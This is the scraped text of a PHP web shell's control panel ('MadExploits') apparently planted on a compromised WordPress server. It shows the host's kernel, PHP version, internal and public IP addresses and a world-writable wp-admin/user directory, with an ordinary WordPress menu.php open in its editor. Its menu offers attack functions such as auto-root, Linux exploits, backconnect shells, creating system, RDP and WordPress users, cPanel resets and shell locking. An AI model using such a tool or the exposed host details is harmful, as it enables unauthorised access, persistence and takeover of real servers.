Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 3.144.95.167
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms /
wp-admin /
user /
[ HOME SHELL ]
Name
Size
Permission
Action
about.php
257
B
-rwxrwxrwx
admin.php
865
B
-rwxrwxrwx
credits.php
261
B
-rwxrwxrwx
freedoms.php
263
B
-rwxrwxrwx
index.php
251
B
-rwxrwxrwx
menu.php
758
B
-rwxrwxrwx
privacy.php
261
B
-rwxrwxrwx
profile.php
252
B
-rwxrwxrwx
user-edit.php
250
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : menu.php
<?php /** * Build User Administration Menu. * * @package WordPress * @subpackage Administration * @since 3.1.0 */ $menu[2] = array( __( 'Dashboard' ), 'exist', 'index.php', '', 'menu-top menu-top-first menu-icon-dashboard', 'menu-dashboard', 'dashicons-dashboard' ); $menu[4] = array( '', 'exist', 'separator1', '', 'wp-menu-separator' ); $menu[70] = array( __( 'Profile' ), 'exist', 'profile.php', '', 'menu-top menu-icon-users', 'menu-users', 'dashicons-admin-users' ); $menu[99] = array( '', 'exist', 'separator-last', '', 'wp-menu-separator' ); $_wp_real_parent_file['users.php'] = 'profile.php'; $compat = array(); $submenu = array(); require_once ABSPATH . 'wp-admin/includes/menu.php';
Close